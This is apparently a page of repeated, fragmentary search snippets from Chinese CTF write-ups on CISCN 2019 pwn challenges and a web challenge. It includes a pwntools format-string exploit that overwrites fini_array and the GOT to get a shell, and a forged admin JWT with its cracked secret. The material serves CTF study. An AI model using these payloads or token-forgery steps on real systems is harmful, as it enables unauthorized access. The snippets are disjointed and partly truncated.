ciscn_2019_sw_1 思路 通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址) 我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell exp:...ciscn_2019_sw_7 思路 堆...
ciscn_2019_sw_7 堆溢出与整数溢出漏洞 一般再libc-2.27.so的库中,如果限制了大小,那么基本上只有两种方法,一种是orange,还有一种就是堆溢出,然后修改size大小为unsorted bin中的大小来leak libc。 由于本题有堆溢出,但限制了堆的大小,所以我们想泄露libc,只能使用后者(因为申请的chunk大小被限制了),而在有tache...
ciscn_2019_sw_1 思路 通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址) 我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell exp:... ciscn_2019_sw_7 思路 ...
frompwnimport*sh = process("./ciscn_2019_sw_1")# 往fini.array[0]写main@text, printf@got写system@pltpayload =b"%2052c%13$hn%31692c%14$hn%356c%15$hn"+ p32(0x804989c+2) + p32(0x804989c) + p32(0x804979c)sh.recvline()sh.sendline(payload)sleep(1)sh.sendline("/bin/sh")...
ciscn_2019_sw_1 总结 根据本题,学习与收获有: 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写;为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写;为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。
ciscn_2019_sw_7 堆溢出与整数溢出漏洞 一般再的库中,如果限制了大小,那么基本上只有两种方法,一种是orange,还有一种就是堆溢出,然后修改size大小为unsorted bin中的大小来leak libc。 由于本题有堆溢出,但限制了堆的大小,所以我们想泄露libc,只能使用后者(因为申请的chunk大小被限制了),而在有tache的情况下,要...
ciscn_2019_c_5 思路 格式化字符串leak然后打free_hook exp:...ciscn_2019_c_3 思路 通过后门函数改fd然后tcache dump打到free_hook即可 exp:...ciscn_2019_sw_1 思路 通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址) 我们是通过libc_start_main调用...
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo 修改cookie的JWT发包,点击一键成为大会员,并没有什么反应。 但是在网页源码中显示出了备份文件的网址,下载备份文件 python反序列化漏洞 become = self.get_argument('become') p = ...
需要admin权限 这里注意到有jwt签名,在使用c-jwt-crack爆破一下密钥,这工具github上有 这里看到密钥为1Kun 去https://jwt.io/上伪造一份admin的签名 伪造后的签名为 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo ...
ciscn_2019_sw_2 总结 libc-2.27版本下的off by null。 题目分析 checksec 漏洞点 在add分支,存在一个off by null,由strcpy导致的 利用思路 步骤: 三明治结构,泄露地址 ...